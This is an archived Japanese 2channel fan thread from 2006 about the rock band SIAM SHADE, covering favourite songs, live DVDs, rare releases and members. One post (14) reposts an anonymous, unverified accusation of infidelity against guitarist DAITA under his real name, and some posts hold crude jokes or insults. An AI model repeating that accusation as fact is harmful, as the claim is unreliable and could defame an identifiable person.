5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【おさるの】SIAM SHADE 2【科学】

1 :伝説の名無しさん:2006/05/24(水) 18:31:19
伝説の神バンド、SIAM SHADEについて激しくかたるべし!

2 :伝説の名無しさん:2006/05/24(水) 19:03:03
>>1乙!

3 :伝説の名無しさん:2006/05/24(水) 22:17:25
ラストライブのせつなさ〜に映ってる人ってカズマの親父さんなの?

4 :伝説の名無しさん:2006/05/24(水) 23:35:01
>>1乙!もうダメかと思ったよ
ところでまた聞きたいけど、ヒデキ氏のライブに10代の女ひとりは浮くかな

5 :伝説の名無しさん:2006/05/25(木) 02:38:20
浮いたからどうなの?

6 :伝説の名無しさん:2006/05/25(木) 12:20:08
や、さすがに女ひとりは不審かなと…

7 :伝説の名無しさん:2006/05/25(木) 13:23:36
余裕。

8 :伝説の名無しさん:2006/05/25(木) 16:00:51
>>1
せつなさよりも乙へ

9 :伝説の名無しさん:2006/05/25(木) 17:04:14
スレタイがちょっと…

10 :伝説の名無しさん:2006/05/25(木) 17:48:59
ウォーイェー

11 :伝説の名無しさん:2006/05/25(木) 18:38:57
スレタイ好きだけどなあ

12 :伝説の名無しさん:2006/05/25(木) 23:58:25
>>1
曇りのち乙

13 :伝説の名無しさん:2006/05/26(金) 00:54:05
>>1 1/3の純情な乙

14 :伝説の名無しさん:2006/05/26(金) 11:57:26
http://love3.2ch.net/test/read.cgi/furin/1144081988/379

379 名前: 名無しさんといつまでも一緒 投稿日: 2006/05/26(金) 00:02:29 0
DAITA=伊藤大太さんに騙されていました
彼はすでに奥さんが3人目の子供を妊娠出産していたんです。
変だと思って真相を問いつめたら逆切れされました。
悲しくて、苦しくて何度も死のうと思ったけれど
周りへの迷惑を考えたら、自殺すら出来ませんでした。
より子ちゃんも彼に酷い事されて、あんな事になって許せるの?


15 :伝説の名無しさん:2006/05/26(金) 13:34:16
>>1乙な木の下で

16 :伝説の名無しさん:2006/05/26(金) 15:05:41
>>1グレイシャル乙

17 :伝説の名無しさん:2006/05/26(金) 20:41:22
>>1NEVER乙

18 :伝説の名無しさん:2006/05/27(土) 02:36:28
>>1D.乙.I

19 :伝説の名無しさん:2006/05/27(土) 13:20:52
>>1乙 Vanpire

20 :伝説の名無しさん:2006/05/27(土) 13:29:16
>>1乙らない街

21 :伝説の名無しさん:2006/05/27(土) 18:20:21
乙 ヴァンパイア
おっぱいはいやwww

>>1 GET A 乙

22 :伝説の名無しさん:2006/05/27(土) 18:51:03
Don't tell 乙

23 :伝説の名無しさん:2006/05/27(土) 20:03:23
>>1






乙 Believe

24 :伝説の名無しさん:2006/05/27(土) 20:30:56
>>1






乙 not?

25 :伝説の名無しさん:2006/05/27(土) 21:28:28
>>1乙SICK

26 :伝説の名無しさん:2006/05/27(土) 21:42:53
>>1乙告

27 :伝説の名無しさん:2006/05/27(土) 21:55:38
おまいら乙たがり症候群だな。

28 :伝説の名無しさん:2006/05/27(土) 22:46:13
みんな大好きだwww

29 :伝説の名無しさん:2006/05/28(日) 00:08:17
ワロスwww
今日中古でUを買った。ヒデキの名前がCHACKになってたのにビビった。

30 :伝説の名無しさん:2006/05/28(日) 00:14:31
>>28
そんなあなたが大好きだwww

31 :伝説の名無しさん:2006/05/28(日) 00:20:51
レイプマンテラワロスwwwwww

32 :伝説の名無しさん:2006/05/28(日) 01:22:14
BLOODY>>1乙N

33 :伝説の名無しさん:2006/05/28(日) 12:07:25
この流れはいつまで続けるの?
終わらない乙



>>19
かぶりスマソ

34 :伝説の名無しさん:2006/05/28(日) 12:10:09
I am 乙

35 :伝説の名無しさん:2006/05/28(日) 12:37:53
もう秋田

36 :伝説の名無しさん:2006/05/28(日) 13:53:26
みんなご苦労様!w

37 :伝説の名無しさん:2006/05/28(日) 14:02:09
まだ40いかないね

38 :伝説の名無しさん:2006/05/28(日) 15:14:40
>>29
そんな事も知らないお前に皆がワロスww
お前が書き込みした内容はそういう事だ。
自分をけなされて嫌な思いするなら、意味もなくwだのワロスだの使うな厨房!

39 :伝説の名無しさん:2006/05/28(日) 16:31:28
>>38ごめんね
今まで曲を聴いてただけだったから、メンバーの事を詳しく知らないんだ
ごめんね

40 :伝説の名無しさん:2006/05/28(日) 17:07:33
END OF LOVEかっけぇ

41 :伝説の名無しさん:2006/05/28(日) 21:24:26

みーーんな

乙.乙.乙.


42 :伝説の名無しさん:2006/05/28(日) 21:38:54
そろそろこの流れは飽きたな

43 :伝説の名無しさん:2006/05/28(日) 22:24:50
Rainをあらためて聞いてみたけど、何か良かったよ
昔はあんまり思わなかったのに

44 :伝説の名無しさん:2006/05/28(日) 23:14:42
この頃思うよ 君の微笑みは

45 :伝説の名無しさん:2006/05/29(月) 00:23:35
数しれない時に光をくれた〜 貴方に出会った喜びは今も感じているよ〜

RAINは疾走感も失踪感もあって(・∀・)イイ

イントロのスラップも疾走感演出してるし
ドラムのリズムもしかり曲のシメ方も良いし
無駄があんまりない曲って感じがする

各メジャーのオリアルで強引に好きな曲1曲ずつあげると自分はこんな感じ

Uレイン
Vデスティネーショントゥルース
Wブラッディトレイン
Xネバーエンド
Y ムーン



46 :伝説の名無しさん:2006/05/29(月) 00:35:40
RAINにスラップなんてあったか?

47 :伝説の名無しさん:2006/05/29(月) 01:11:12
イントロでスラップなかったっけ?
最近聴いてなかったから勘違いかな…('A`)
明日聴きなおしてみる

48 :伝説の名無しさん:2006/05/29(月) 02:35:11
>>45
自分はこんな感じで。8はオリジナルアルバムじゃないが。

2:ドリームレスワールド
3:レットイットゴー
4:マネーイズキング
5:グレイシャルラブ(ことえりで「GLAYシャル羅武」と変換されたorz)
6:シャングリラ
8:ジャンピングジャンキー

49 :伝説の名無しさん:2006/05/29(月) 13:16:58
初武道館とラスト武道館って見ててどっちが楽しい?

50 :真夜中の埋め職人:2006/05/29(月) 14:32:59
また埋めてやるからな

51 :伝説の名無しさん:2006/05/29(月) 17:18:25
ラスト
もし1999演奏してたら初

52 :伝説の名無しさん:2006/05/29(月) 19:11:05
U SADNESS
V PRIDE
W Money is king?
X 警告
Y Allergy
[ Crime

よしっ

53 :伝説の名無しさん:2006/05/29(月) 19:55:03
2 CALLING
3 Dazed and Alone
4 Dear…
5 DEAD SPACE
6 Shangri‐la

警告とかピンクスパイダーも好き

54 :伝説の名無しさん:2006/05/29(月) 19:57:52
どうよ?
http://music4.2ch.net/test/read.cgi/legend/1046006694/

55 :伝説の名無しさん:2006/05/29(月) 20:33:04
アルバムTはないの?

56 :伝説の名無しさん:2006/05/29(月) 21:50:09
1 Imagination
2 CAN'T FORGET YOU
3 Why not?
4 PASSION
5 MONKEY SCIENCE
6 せつなさよりも遠くへ

う〜ん。我ながらなんの面白みもない選択だ。

57 :伝説の名無しさん:2006/05/29(月) 23:02:37
1:時の川の中で
2:Dreamless world
3:Why not?
4:Bloody Train
5:DEAD SPACE
6:Allergy

こんなところだろ

58 :伝説の名無しさん:2006/05/30(火) 02:52:22
>>55あるよ

59 :伝説の名無しさん:2006/05/30(火) 03:06:40
1 GET A LIFE
2 JUMPING JUNKIE
3 Allergy
4 PASSION
5 D.Z.I.
6 Don't Tell Lies

やっぱり、SIAMは良いよね!

60 :伝説の名無しさん:2006/05/30(火) 03:23:27
意味がわからん

61 :伝説の名無しさん:2006/05/30(火) 13:27:20
>>59

62 :伝説の名無しさん:2006/05/30(火) 14:42:50
X信者のダチに男樹見せてみた。
最初「こんなバンド好きにならね〜よww」
ドンテル中「まだライヴDVDないの?」
…なんか勝利www

63 :伝説の名無しさん:2006/05/30(火) 16:46:45
X信者ってあれキモイよな。

たしかにXはすごいけど・・・

64 :伝説の名無しさん:2006/05/30(火) 19:19:42
そこまで好きになれるモノがあるってウラヤマシス

65 :伝説の名無しさん:2006/05/30(火) 20:22:01
解散してからヲタになった人も多いみたいだけど、皆はシングル曲で言うといつ頃からのヲタ?

66 :伝説の名無しさん:2006/05/30(火) 21:32:27
RAINのイントロにめちゃ惚れた
でも…当時の彼女がシャム嫌い…
俺は彼女に逆らえず、3以降ほとんど聴けずで…
気付いたら…解散……

67 :伝説の名無しさん:2006/05/30(火) 21:55:32
>>66付き合おうか

68 :伝説の名無しさん:2006/05/30(火) 21:57:12
1時の川の中で
2レイン
3デスティネーショントゥルース
4ブラッディトレイン
5デッドスペース
6アレルギー
8ジャンピングジャンキー


エンドレスワールドはイントロで腹八分目までくるからレインを選んだ。
6はシャングリラと悩んだけど転調がカッコイイアレルギーでw

シャムとの出会いはTIMES?か何かがタイアップになって中古のUを興味本意で手にとったらドリームレスにやられますた

69 :伝説の名無しさん:2006/05/31(水) 00:26:20
これ何度見ても笑えるなw

ttp://www.youtube.com/watch?v=-pEu5VCPfcE&search=SIAM%20SHADE

70 :伝説の名無しさん:2006/05/31(水) 12:15:27
>>67
wwwありがとう
ちなみに今は聴き放題ww
やっぱり音楽くらい好きなの聴けなきゃ駄目だな。

71 :伝説の名無しさん:2006/05/31(水) 13:46:21
俺はベタだけど1/3〜からだな

72 :伝説の名無しさん:2006/05/31(水) 19:25:13
解散してから1/3を知ってアルバム4買ったんだけど。
Dear...でやられたわ。

73 :伝説の名無しさん:2006/05/31(水) 19:31:17
>>72
おめでとう。
あなたは立派な耳と感性の持ち主と認定されました。

74 :伝説の名無しさん:2006/05/31(水) 19:34:55
Dear…はいきなりサビから始まるから好きだ

75 :伝説の名無しさん:2006/05/31(水) 20:05:52
馬鹿共晒しage

76 :伝説の名無しさん:2006/05/31(水) 20:23:49
シャムを全然知らん友人(♀)にWを貸してみた
反応が楽しみだ

77 :伝説の名無しさん:2006/05/31(水) 20:44:16
>>76
きっと聴いてないお^^

78 :伝説の名無しさん:2006/05/31(水) 20:48:41
俺も「シャムシェイドいいよ」とか言ってたら貸してって言ってきたからさりげなくXを貸したけど多分聞いてないな…

79 :伝説の名無しさん:2006/05/31(水) 22:02:20
ジャンヌダルクと被るわ
でもジャンヌダルクのがいいよ

80 :伝説の名無しさん:2006/05/31(水) 23:06:33
>>69
後に解散しちゃうと思うと泣けてくる・・・

81 :伝説の名無しさん:2006/05/31(水) 23:11:10
>>79
わざわざSIAMスレ来て言わなくても……

ジャンヌはポップで明るい感じを楽しむにはちょうどいい。

82 :伝説の名無しさん:2006/06/01(木) 01:06:06
>>78状況が全く一緒だよ!w
やっぱ聞いて貰えんかな…

83 :伝説の名無しさん:2006/06/01(木) 16:46:32
今日大学の友達に4かしてきます。
初心者だから5と迷ったけど4でいいよね?

84 :伝説の名無しさん:2006/06/01(木) 17:53:55
初心者ならやっぱ\じゃね?シングルベストみたいだし俺はいろんなアルバム聞いてたが
4番目に聞いた\でハマッた。rainとかtime"sあたりで結構気に入ったのを覚えてる

85 :伝説の名無しさん:2006/06/01(木) 19:06:28
ジャンヌ イェイ!!
シャムブサバンド イェイ!!


86 :伝説の名無しさん:2006/06/01(木) 20:43:40
顔面でいったらジャンヌのがヤバいだろ。ドラムとキーボードが特に痛すぎww

87 :伝説の名無しさん:2006/06/01(木) 20:59:10
ジャンヌwwwww

88 :伝説の名無しさん:2006/06/01(木) 21:01:23
yasuの声は、俺は苦手だ

89 :伝説の名無しさん:2006/06/01(木) 21:49:50
avexのジャンヌダルクwwww

90 :伝説の名無しさん:2006/06/01(木) 23:00:10
ジャンヌはガキ向け
シャムはオバ向け

91 :伝説の名無しさん:2006/06/01(木) 23:24:05
どちらも良いじゃまいか

Wを貸してた訳だが、なかなか好印象の様だった
これを機に…

92 :伝説の名無しさん:2006/06/01(木) 23:59:34
>>84 \かぁ シングル曲は無難な曲多いしそうすれば良かったね。

本当は自分がハマッたのはUを聴いてからだからUも考えたんだけどシェイクミーダウンのラップ?聴かせるのがちょっと怖くなったんだ(´・ω・`)ヒデキごめん

ヒデキの目って中々以内目だよね(・A・)そこらのヤンキーの目じゃなくて…

93 :伝説の名無しさん:2006/06/02(金) 00:01:19
SIAM好きが好きな洋楽ってどんなの?

94 :伝説の名無しさん:2006/06/02(金) 00:03:43
各シャムの「色」が出てるのはやはり偶数アルバムだからその貸す相手が知ってる曲が入ってるのを貸せばいいと思うよ
全く知らないなら俺は4→3→6→2(+1)→5(+7)で貸すかな

95 :伝説の名無しさん:2006/06/02(金) 00:49:30
5もミックスの関係かドラムの音弱いしギターが全面に出てて印象がポップだから聴きやすそうじゃない?

ハードなシャムと画一されちゃいそうだけど
5→4→2→3→6 みたいにポップなのからシャムの本色に馴染ませるのもアリかなって思う。

前に学校にシャムもってったら『シャムシェイドだ!うるさいだけだよね』
って言われた。
1/3のバンドって印象はなさげだけど彼等の耳にはどう聴こえてたんだろう…

96 :伝説の名無しさん:2006/06/02(金) 00:58:56
ドリームシアターとか聞く。最近のドリームシアターは好きじゃないけど

97 :伝説の名無しさん:2006/06/02(金) 01:00:59
SIAMでドリムシ好きなのってDAITAと淳士だっけ?

ドリムシはアウェイクが好き
次点がイメージ&ワーズとか

98 :伝説の名無しさん:2006/06/02(金) 01:04:40
イメージズ&ワーズは最強だな。

99 :伝説の名無しさん:2006/06/02(金) 02:44:35
T Imagenation
U can't forget you
V why not?
W Love vampire
X DEAD SPACE
Y せつなさよりも遠くへ

絞るのムズい
ドリムシはイメージズ&ワーズとメトロポリスpartUなんちゃら〜が好きだ(・∀・)



100 :伝説の名無しさん:2006/06/02(金) 14:21:13
駆け抜けろ MONKEY SCIENCE

101 :伝説の名無しさん:2006/06/02(金) 17:48:46
新しいヴォーカルはイザムらしいな

102 :伝説の名無しさん:2006/06/02(金) 19:16:07
ドリムシはアウェイクとシックスディグリースとトレインオブソートが好き

そんな俺はシャムではGET A LIFE と ドンテル 

インストだったら、Solomon's sealとTriptychが好きだし、
あの二曲はペトルーシが弾いてもおかしくないクオリティの高いインストだと思った。

103 :伝説の名無しさん:2006/06/02(金) 19:58:10
やっぱり洋楽だと皆プログレ中心に聞くの?
俺ELPくらいしか聞かないんだが……
プログレ以外だとangra、ドリムシ、ハロウィンとか。
洋楽聞き始めたばっかだけど。

104 :伝説の名無しさん:2006/06/02(金) 22:06:39
みんな洋楽聴いてんだね
自分全くだわ

105 :伝説の名無しさん:2006/06/02(金) 22:55:05
kornとかslipknot,dopeあたりをよく聴くんだけど、
SIAM好きとしては異端ですか?

106 :伝説の名無しさん:2006/06/02(金) 23:08:28
KORNとかスリップノットはあんまり聴いたことないけどKORNはNASとfeatしてるのはかっこよかった(・∀・)

自分はドリムシ、ヘイレン、ツェッペリン、ナインインチネイルズ、スマパンとかレディヘとかかなぁ
後は初期エアロとか

107 :伝説の名無しさん:2006/06/02(金) 23:08:48
SIAM好きでスリップノット聴いてるヤシは意外に多いよ。
俺はゼブラヘッド(´Д`)

108 :伝説の名無しさん:2006/06/02(金) 23:42:15
ニューメタル(笑)

109 :伝説の名無しさん:2006/06/03(土) 01:04:12
俺はマリリンマンソン、ジェフベック、カルロスサンタナ、スリップノット、エリックマーティン
とかだな

110 :中国緑茶 ◆U76uo.7tB. :2006/06/03(土) 09:30:56
俺は結構いろいろ聴いてると思うよ。
HR/HM全般にMETALCORE、SCREAMO、POP PUNKとかGRINDとかJAZZ、FUSIONとかも聞くよ。
たまに耳が疲れたときにFUSIONとか菊とスカッとするね。

111 :伝説の名無しさん:2006/06/03(土) 12:30:59
何この自慢大会

112 :伝説の名無しさん:2006/06/03(土) 14:34:12
シャムみたいな疾走感あるプログレバンドないのかな?

ドリムシはナシね

113 :伝説の名無しさん:2006/06/03(土) 16:40:19
シャムはドリームシアターの大ファン。
ナッチンの髪型がマイアングとそっくりな時代があった。
シャムに変拍子の曲が多いのもドリームシアターの影響かと思われ。

114 :伝説の名無しさん:2006/06/03(土) 18:20:18
周知の事実じゃん

115 :伝説の名無しさん:2006/06/04(日) 02:48:16
V8のDVDがアマゾンで受注不可なんだけど自分のあしで探すしかないよね?(´・ω・`) MTVやらなにやらで
つまりは手持ちの無くしたっぽい…
ライヴのドリームレスとかムーンききたいよ。・゚(ノД`)゚・。

116 :伝説の名無しさん:2006/06/04(日) 02:57:05
SIAMのDVDを買おうと思って色々と調べたんですけど、今、発売してる武道館や男樹のDVDと生産が終了した武道館や男樹のDVDは値段が違うんですが、内容は違うんですか?今、売ってるヤツは生産終了のと比べると値段が半額ぐらいなんですけど。

117 :伝説の名無しさん:2006/06/04(日) 09:05:19
>>116
現行版は、内容は同じで、お得なお値段になっております。

118 :伝説の名無しさん:2006/06/04(日) 12:11:47
買っても内容変わらないよ。廉価版だから気にすんな

119 :伝説の名無しさん:2006/06/04(日) 13:39:00
117
118
ありがとう。内容は変わらないんですね。男樹から買ってみようと思います。

120 :伝説の名無しさん:2006/06/04(日) 15:45:09
>>119
先に男樹買っちゃうと他のライブが少ししょぼく見えたりする。ハードなのが
好きならお勧め

121 :伝説の名無しさん:2006/06/05(月) 01:22:54
映像は何か苦手だ…
どうしても吹いてしまう

122 :伝説の名無しさん:2006/06/05(月) 11:25:15
潮を?吹くの…?……おぉ…

123 :伝説の名無しさん:2006/06/05(月) 20:08:24
ちょwwwどんだけwwwww想像して吹いたじゃまいかwwwwwwww


124 :伝説の名無しさん:2006/06/06(火) 01:46:07
潮を?

125 :伝説の名無しさん:2006/06/06(火) 11:13:54
シャムシェイドは映像で見てる人を吹かせる事が出来るのか

126 :伝説の名無しさん:2006/06/06(火) 15:31:19
英喜のしなやかな脚

127 :伝説の名無しさん:2006/06/06(火) 19:30:48
>>124ちょwwwwwwwww

128 :伝説の名無しさん:2006/06/06(火) 21:05:39
おまいら最高だよ

129 :伝説の名無しさん:2006/06/07(水) 03:38:18
あ〜、仕事辛い(´Д`)

130 :伝説の名無しさん:2006/06/07(水) 12:21:38
V8のリスクを見てると、最後の方に映ってる女性につられて泣いてしまいそうだ。

131 :伝説の名無しさん:2006/06/07(水) 20:26:57
>>129SIAM SHADEV聴いて溜ってるイライラ解消するのも悪くない

132 :伝説の名無しさん:2006/06/07(水) 23:26:18
そだね、ありがとう。
6時40分まで長いけど、頑張るよ!
早くお盆こねぇかな(´〜`;)

133 :伝説の名無しさん:2006/06/08(木) 00:22:24
ヒデキのブログにシャムの事コメントしてる人いるけど、ヒデキ怒らないかなあ

134 :伝説の名無しさん:2006/06/08(木) 08:34:15
別に怒る程の内容じゃなくね?
仮に今、SIAM復活なんて言ったら「足と上を目指すって約束はどーしたんだ!」ってブーイングも多そうだよね。

135 :伝説の名無しさん:2006/06/08(木) 13:25:38
足?

136 :伝説の名無しさん:2006/06/08(木) 13:25:59
あの世代のバンドで再結成ビジネスの先陣切るのは
シャム?ルナシー?黒夢?

137 :伝説の名無しさん:2006/06/08(木) 13:46:45
たぶんルナシー

138 :伝説の名無しさん:2006/06/08(木) 17:21:16
シャムのアルバムをポータブルオーディオに入れようとしたらポップ/ヘアメタルって表記されたんだけどヘアメタルってどんなジャンルなのかな?

ヘアが意味わからん…

139 :伝説の名無しさん:2006/06/08(木) 18:33:28
年に一度でいいんだ…

140 :伝説の名無しさん:2006/06/08(木) 18:52:10
大太が再結成つーか、麺と仕事はありますって質問に、
わかりません☆って答えててなをか虚しくなった

141 :DAITA:2006/06/08(木) 18:57:16
わかりません☆

142 :伝説の名無しさん:2006/06/08(木) 19:20:58
>>140
日本語でおk

143 :伝説の名無しさん:2006/06/08(木) 21:34:04
そういえば解散後メンバー全員ほとんどピンでやってるね
acidとorもちょっとだけだったし

144 :伝説の名無しさん:2006/06/08(木) 22:52:53
復活してほしーな、
シャム。
生でみてみたいよ。

145 :伝説の名無しさん:2006/06/08(木) 22:57:28
初めてGraysh Wingいい曲だな
もっと違う曲たくさん聞くとするか…

146 :伝説の名無しさん:2006/06/09(金) 05:10:12
ダイタのDVD3枚でてるが一番新しいの買えばだいたい入ってるって感じ?


147 :伝説の名無しさん:2006/06/09(金) 17:11:51
>>145

148 :伝説の名無しさん:2006/06/10(土) 10:29:41
SIAM SHADE IIって初回仕様ってありますか?ステッカー封入とか。
IIIはスコープみたいなのが付いてるのが初回だと思うのですが…。

149 :伝説の名無しさん:2006/06/10(土) 12:58:47
>>148
ほぼすべてのアルバムにあるよ。ないのはBーsideぐらいじゃないかな。

150 :伝説の名無しさん:2006/06/10(土) 16:08:16
そうなんですか(゜o゜)
III以降は分かるんですが、インディーズのとIIの初回ってどんなんなんですか!?

151 :伝説の名無しさん:2006/06/10(土) 21:35:36
>>150
Tは分かんないや、Uは俺中古で買ったんだけどステッカー入ってたよ。

152 :伝説の名無しさん:2006/06/10(土) 22:22:16
アルバムTってどこで売ってるの?聞いてみたいんでけど

153 :伝説の名無しさん:2006/06/10(土) 23:12:00
151
ありがとう。やっぱ、ステッカー入りが初回なんですね。
152
インディーズのヤツは現在は廃盤なんでオクで探すしかなさそうですよ。でも、聴いてみる価値ありです。ローズマイリーズンなんかヤバいです!

154 :伝説の名無しさん:2006/06/10(土) 23:44:16
>>152
中古屋で売ってると思うよ
タワレコとかでも見たことあるし

155 :伝説の名無しさん:2006/06/11(日) 08:21:57
LOVESICKの阿漕とかエンドのCDとかは簡単だが
ドールのCD入手は苦労しませんでした?
MDなら出回ってるが現品は結構レアかと買ったが高すぎ
金欠になったら売るのもいいかもな






156 :伝説の名無しさん:2006/06/11(日) 13:26:00
>>155売るなら是非自分に

157 :伝説の名無しさん:2006/06/11(日) 18:31:07
DOLLはいくらで買ったんですか?オクでも見た事ないでつ。
EMERGENCY EXPRESSも持ってない…。

158 :伝説の名無しさん:2006/06/11(日) 19:47:44
うるさい うるさいうるさい!!

159 :伝説の名無しさん:2006/06/11(日) 22:32:21
>>128もちけつ
つ旦~~

160 :伝説の名無しさん:2006/06/12(月) 03:13:31
DAITAが今回椎名へきるに提供した2曲もオススメだよ

161 :伝説の名無しさん:2006/06/12(月) 17:09:01
今回っていつ?

162 :伝説の名無しさん:2006/06/12(月) 18:02:01
抱いた椎名へきる

163 :伝説の名無しさん:2006/06/13(火) 17:36:12
ギタドラの一馬(&あさき)曲が気に入っているんだが、
1曲の為にCD買いたくない自分が居る。

164 :伝説の名無しさん:2006/06/13(火) 19:47:12
おれも好き

165 :伝説の名無しさん:2006/06/14(水) 00:20:36
DOLLオークションじゃでたことないよね
都内のレアショップで自分は5万でした
札幌の中古店で10万で見たことあったので買っちゃいましたが
10万ってどうなのよ・・・そんなたいそうな曲じゃないのに



166 :伝説の名無しさん:2006/06/14(水) 00:53:24
結局5万と10万どっちだよ

167 :伝説の名無しさん:2006/06/14(水) 12:59:14
いやぁ〜、やっぱり高額ですね。でも、一度はどんな曲なのか聴いてみたい。
1/3の純情な抜粋って何か分かる人いますか?オクで見たんですけど、当時の何かプレゼントとかですか?

168 :伝説の名無しさん:2006/06/15(木) 15:00:39
>>165
たまに出るよ
ttp://page6.auctions.yahoo.co.jp/jp/auction/f44905229

でもレアっていってもラジオで流れたりしてたような

169 :伝説の名無しさん:2006/06/16(金) 01:38:19
RAINは最初そんなに好きじゃなかったんだけど
最近梅雨なせいか好きになってきた

170 :伝説の名無しさん:2006/06/16(金) 12:05:47
>>163
俺もー。
なのでギタドラで我慢。
家庭用が出ただけありがたいや。

171 :伝説の名無しさん:2006/06/18(日) 13:33:42
age

172 :伝説の名無しさん:2006/06/19(月) 13:32:05
youtube

にうpされたWHY NOT ? don't tell lise

カッコ良すぎる

173 :伝説の名無しさん:2006/06/19(月) 19:43:47
>>172
まじだ!
これってホントに武道館??
なんか見た感じ似てるけど

174 :伝説の名無しさん:2006/06/19(月) 19:48:35
don't tell liseはライブの一番の楽しみだった…

無心でヘドバンし誰よりも高く跳ぶんだ…

175 :伝説の名無しさん:2006/06/19(月) 20:27:31
かっこいいけど、音しょぼいな

176 :伝説の名無しさん:2006/06/19(月) 22:26:40
liseじゃなくてliesだよ

177 :伝説の名無しさん:2006/06/20(火) 00:22:49
>>175
明らか音のバランスおかしいよな

178 :伝説の名無しさん:2006/06/20(火) 01:13:06
場所だれも知らないのか…

179 :伝説の名無しさん:2006/06/20(火) 19:09:40
武道館だよ。
97年のイベントで。

180 :伝説の名無しさん:2006/06/20(火) 20:11:13
ライブDVD、どれが買い?

181 :伝説の名無しさん:2006/06/20(火) 23:23:26
男樹

182 :伝説の名無しさん:2006/06/21(水) 03:34:42
個人的にV7がオススメ。no control と imagination あるし。
ちゃんと順番がそのままなのがうれしい。アウトロ→イントロの流れが大好きだ。

あとインストの THE 武道 (ハンドロイド?っていう曲?)

183 :伝説の名無しさん:2006/06/21(水) 10:47:59
男樹昨日注文した

184 :伝説の名無しさん:2006/06/21(水) 11:23:05
NEVER ENDってライヴでやってた?

185 :伝説の名無しさん:2006/06/21(水) 12:23:59
普通にやってた

代々木第一に収録されてるよ

186 :伝説の名無しさん:2006/06/21(水) 14:22:21
シャムファンいい奴ばっかだな。あるバンドのファンとはなんていうか「質」が違うというか。

187 :伝説の名無しさん:2006/06/21(水) 19:41:18
>185 THX!
今度買って見る

188 :伝説の名無しさん:2006/06/21(水) 22:32:32
アドレナリンって初回盤存在する?

189 :伝説の名無しさん:2006/06/21(水) 23:05:08
>>186
そういう発言するから、SIAM SHADEファンは痛いとか言われるんだよな

190 :伝説の名無しさん:2006/06/22(木) 01:16:06
>>185
ネバーエンドって変拍子だからリズム感無い腐女子どもがのれてないのがとても楽しかったのを思い出した。

191 :伝説の名無しさん:2006/06/22(木) 15:17:09
男樹届いた。見てみた。最高。

192 :伝説の名無しさん:2006/06/22(木) 15:46:49
ラストライヴの秀喜って冷めてるなーと思う

193 :伝説の名無しさん:2006/06/22(木) 16:03:29
>>192
一馬があまりにもとんでもなくやる気がなさすぎてワロスだけどな

194 :伝説の名無しさん:2006/06/22(木) 16:08:23
>193 あれはやる気がないのかw 淳士が頑張ってんなーて思った。 てかラストライヴしか見たことないからわからんわ^_^;

195 :伝説の名無しさん:2006/06/22(木) 16:09:12
END OF LOVEってメジャーデビューしてからもライブでやってた?

196 :伝説の名無しさん:2006/06/22(木) 16:27:37
ライブDVDって何個あるの?今持ってるのは解散ライブと男樹だけ。
他にお勧めは?

197 :伝説の名無しさん:2006/06/22(木) 16:31:44
>196 初武道館

198 :伝説の名無しさん:2006/06/22(木) 17:16:30
196
V4は、CRIMEがお勧め!

199 :伝説の名無しさん:2006/06/22(木) 17:21:33
ラストライブって何であんな微妙なセットリストだったんだ。

200 :伝説の名無しさん:2006/06/22(木) 17:28:15
>>199
一馬が歌いたくない曲はセットリストに入れなかったからだよ

201 :伝説の名無しさん:2006/06/22(木) 21:10:05
ホント、遠藤いらね。あいつがSIAMの足引っ張ってたよ。

202 :伝説の名無しさん:2006/06/22(木) 21:23:17
でも、もともとは栄喜が抜けて、そこに一馬がVoで入るはずだったけど
なぜか栄喜が戻ってきて〜とかどっかで見た気がする。

そのおかげでツインボーカル・ギターになったからいんじゃね?
解散うんぬんは別として。

203 :伝説の名無しさん:2006/06/22(木) 22:25:56
>>201
まぁまぁ。あやつのおかげで
ツインボーカルになって結果カラオケで楽しさ2倍なわけだし。


204 :伝説の名無しさん:2006/06/22(木) 23:06:55
波照間で微笑みを

と脳内変換してしまった

205 :伝説の名無しさん:2006/06/22(木) 23:45:36
一馬がメインVo.だったらファンになってなかっただろうなww

206 :伝説の名無しさん:2006/06/23(金) 03:32:03
>>195
大阪では1回あったよ。いつか忘れたけど。

207 :伝説の名無しさん:2006/06/23(金) 11:40:58
すまん、遠藤って一馬?

208 :伝説の名無しさん:2006/06/23(金) 11:45:59
>>207
そだよ。

209 :伝説の名無しさん:2006/06/23(金) 12:54:37
>208 サンクス

210 :伝説の名無しさん:2006/06/23(金) 13:19:15
SIAM SHADEは5人でSIAM SHADEだよ

211 :伝説の名無しさん:2006/06/23(金) 19:02:56
今CD見にいったらSIAM SHADE 5の初回限定のやつがあった。衝動買いしてしまったバカな俺。

212 :伝説の名無しさん:2006/06/23(金) 19:41:18
一馬曲いいじゃん

213 :伝説の名無しさん:2006/06/23(金) 19:51:45
V4でカットされてる曲って何ですか??

214 :伝説の名無しさん:2006/06/23(金) 20:59:47
一馬の曲は好きだが、ヒデキを聴いた後に一馬を聴くと歌い方にイライラしてしまうのは漏れだけか?

215 :伝説の名無しさん:2006/06/23(金) 21:09:17
一馬の甘ったるい鼻にかかる声も好きになれねー。
曲は別に悪くない。

216 :伝説の名無しさん:2006/06/23(金) 21:51:10
>>213

収録されてる意外の5にはいってる全ての曲。
シャウトアウト グレイシャルラブ ドリームス ブランコなどなど


217 :伝説の名無しさん:2006/06/23(金) 21:51:24
>>211
5の初回って鏡のやつでしょ?
初回じゃないやつ買ったんじゃねーか?

218 :伝説の名無しさん:2006/06/23(金) 21:59:28
>>217

全然会話になってねーぞ
頭大丈夫か??

219 :伝説の名無しさん:2006/06/23(金) 22:03:32
5のブックレットのDAITAワロスw

220 :伝説の名無しさん:2006/06/24(土) 00:13:31
鏡?自分中古で買ったけど、ジャケットはきらきらしてて鏡みたい
もしかしてコレ初回?

221 :伝説の名無しさん:2006/06/24(土) 01:58:49
うん、初回。
良かったね\^o^/

222 :伝説の名無しさん:2006/06/24(土) 03:59:48
>>216
シャウトアウトとブランコは…Xじゃないわよ

223 :216:2006/06/24(土) 05:34:46
>>222

あ、すみません
具体的にやったけど収録されてない曲をあげようとしただけです。
全部あげるの面倒だったので。
すみません

224 :伝説の名無しさん:2006/06/24(土) 08:57:12
ツインだからいい

225 :伝説の名無しさん:2006/06/24(土) 12:19:18
>>221でも他に3枚ぐらいは置いてあったと思うんだけど…

226 :伝説の名無しさん:2006/06/24(土) 12:28:11
>>218
おまいのほうが頭大丈夫か??www

227 :213:2006/06/24(土) 12:48:18
じゃあ警告とかもやってたのか・・・。
聞きたかったなぁ。

228 :伝説の名無しさん:2006/06/24(土) 14:42:18
Dazed and Aloneを生で聴きたかった。LIVEはモンサイツアーから参加したが一度も聴く事なく解散…orz

